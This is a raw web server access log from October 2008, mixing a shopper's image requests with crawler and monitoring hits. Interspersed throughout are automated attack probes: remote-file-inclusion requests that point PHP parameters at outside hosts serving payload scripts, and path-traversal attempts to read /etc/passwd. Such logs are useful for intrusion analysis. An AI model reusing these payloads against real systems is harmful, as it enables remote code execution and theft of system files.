98.210.218.161 - - [22/Oct/2008:00:05:49 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:05:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:05:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:05:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:05:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.141.74.8 - - [22/Oct/2008:00:06:15 -0400] "GET /logs/access_log.Q108032100//skin/zero_vote/errors.php?error=http://www.davemaster.com/dotproject/files//packbot.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
58.141.74.8 - - [22/Oct/2008:00:06:15 -0400] "GET /logs/access_log.Q108032100//skin/zero_vote/errors.php?error=http://www.davemaster.com/dotproject/files//packbot.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
193.136.63.5 - - [22/Oct/2008:00:06:39 -0400] "GET /logs/access_log.Q108101600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.6.17.189 - - [22/Oct/2008:00:06:06 -0400] "GET /logs/access_log.Q108050200 HTTP/1.0" 200 3460546 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
118.219.254.105 - - [22/Oct/2008:00:07:24 -0400] "GET /logs/access_log.Q108062700/index.php?contenido=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
62.97.194.235 - - [22/Oct/2008:00:07:28 -0400] "GET /logs/error_log.Q108101400//include/lib.inc.php?site_path=http://www.v2008.kit.net/idfeel.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
98.210.218.161 - - [22/Oct/2008:00:07:48 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
193.2.97.193 - - [22/Oct/2008:00:07:53 -0400] "GET //?_zb_path=http://apachi.100megsfree8.com/id.gif? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
69.73.151.5 - - [22/Oct/2008:00:08:05 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
62.97.194.235 - - [22/Oct/2008:00:08:35 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.v2008.kit.net/idfeel.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
74.6.17.189 - - [22/Oct/2008:00:07:55 -0400] "GET /logs/error_log.Q108091800 HTTP/1.0" 200 2068888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.110.217.58 - - [22/Oct/2008:00:08:58 -0400] "GET /logs/error_log.Q108100200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
123.214.171.161 - - [22/Oct/2008:00:09:12 -0400] "GET /logs/access_log.Q108062700/index.php?contenido=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
85.214.71.175 - - [22/Oct/2008:00:10:23 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.806"
85.214.71.175 - - [22/Oct/2008:00:10:24 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.806"
85.214.71.175 - - [22/Oct/2008:00:10:24 -0400] "GET /logs/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.806"
98.210.218.161 - - [22/Oct/2008:00:10:40 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:10:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
209.59.12.99 - - [22/Oct/2008:00:10:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.210.218.161 - - [22/Oct/2008:00:10:49 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:10:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:10:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:10:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:10:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.53.196.210 - - [22/Oct/2008:00:11:22 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.53.196.210 - - [22/Oct/2008:00:11:22 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.53.196.210 - - [22/Oct/2008:00:11:22 -0400] "GET /logs/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
85.214.71.175 - - [22/Oct/2008:00:11:23 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.806"
193.136.63.5 - - [22/Oct/2008:00:11:38 -0400] "GET /logs/access_log.Q108090200//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
193.136.63.5 - - [22/Oct/2008:00:11:42 -0400] "GET /logs/error_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:56 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:57 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:58 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:58 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:11:58 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:00 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:00 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:00 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:00 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:00 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:01 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:01 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:01 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:01 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:06 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG HTTP/1.1" 200 37720 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
98.210.218.161 - - [22/Oct/2008:00:12:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF8C962A5177E0000A8C055+M37+ENG HTTP/1.1" 200 37720 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.6.17.189 - - [22/Oct/2008:00:11:19 -0400] "GET /logs/access_log.Q108012100 HTTP/1.0" 200 2909374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.82.135 - - [22/Oct/2008:00:12:37 -0400] "GET //includes/functions_admin.php?phpbb_root_path=http://2excel.com.au/readme1.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.53.196.210 - - [22/Oct/2008:00:12:45 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
82.138.232.96 - - [22/Oct/2008:00:12:46 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://121.254.140.55/~shinapt//upload/File_Dir/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
88.214.192.28 - - [22/Oct/2008:00:13:07 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
88.214.192.28 - - [22/Oct/2008:00:13:07 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
69.73.151.5 - - [22/Oct/2008:00:13:08 -0400] "GET /logs/access_log.Q108100400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
98.210.218.161 - - [22/Oct/2008:00:13:09 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; HbTools 4.7.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
88.214.192.28 - - [22/Oct/2008:00:13:10 -0400] "GET /logs/access_log.Q108092500///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
64.22.82.135 - - [22/Oct/2008:00:13:14 -0400] "GET //includes/functions_admin.php?phpbb_root_path=http://2excel.com.au/id4.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
85.214.118.90 - - [22/Oct/2008:00:13:35 -0400] "GET /logs/access_log.Q108082600/senetman/html/index.php?page=http://members.lycos.co.uk/rfiid/v5.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
85.214.118.90 - - [22/Oct/2008:00:13:35 -0400] "GET /logs/senetman/html/index.php?page=http://members.lycos.co.uk/rfiid/v5.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
85.214.118.90 - - [22/Oct/2008:00:13:35 -0400] "GET /senetman/html/index.php?page=http://members.lycos.co.uk/rfiid/v5.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
85.214.118.90 - - [22/Oct/2008:00:13:38 -0400] "GET /logs/access_log.Q108100300/senetman/html/index.php?page=http://members.lycos.co.uk/rfiid/v5.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
69.20.67.199 - - [22/Oct/2008:00:13:40 -0400] "GET /logs/access_log.Q108100300/senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.20.67.199 - - [22/Oct/2008:00:13:40 -0400] "GET /senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 221 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.73.151.5 - - [22/Oct/2008:00:13:45 -0400] "GET /logs/error_log.Q108100200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
77.79.246.241 - - [22/Oct/2008:00:13:48 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.79.246.241 - - [22/Oct/2008:00:13:48 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.79.246.241 - - [22/Oct/2008:00:13:48 -0400] "GET /logs/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
69.20.67.199 - - [22/Oct/2008:00:13:52 -0400] "GET /logs/error_log.Q108100300/senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.214.192.28 - - [22/Oct/2008:00:13:54 -0400] "GET /logs/error_log.Q108091900///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
69.20.67.199 - - [22/Oct/2008:00:13:57 -0400] "GET /senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
85.119.155.214 - - [22/Oct/2008:00:14:19 -0400] "GET /logs/access_log.Q108081300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
85.119.155.214 - - [22/Oct/2008:00:14:20 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
85.119.155.214 - - [22/Oct/2008:00:14:20 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
77.79.246.241 - - [22/Oct/2008:00:14:28 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
69.20.67.199 - - [22/Oct/2008:00:14:44 -0400] "GET /logs/access_log.Q108082600/senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
69.20.67.199 - - [22/Oct/2008:00:14:44 -0400] "GET /senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
69.20.67.199 - - [22/Oct/2008:00:14:44 -0400] "GET /logs/senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
69.20.67.199 - - [22/Oct/2008:00:14:44 -0400] "GET /logs/access_log.Q108100300/senetman/html/index.php?page=http://www.outofthelair.com/tst.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
74.6.17.189 - - [22/Oct/2008:00:15:02 -0400] "GET /logs/error_log.Q108012300 HTTP/1.0" 200 126549 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.195.157.55 - - [22/Oct/2008:00:15:09 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
82.195.157.55 - - [22/Oct/2008:00:15:09 -0400] "GET /logs/access_log.Q108081300///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
82.195.157.55 - - [22/Oct/2008:00:15:09 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
82.195.157.55 - - [22/Oct/2008:00:15:09 -0400] "GET /logs/access_log.Q108100300///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
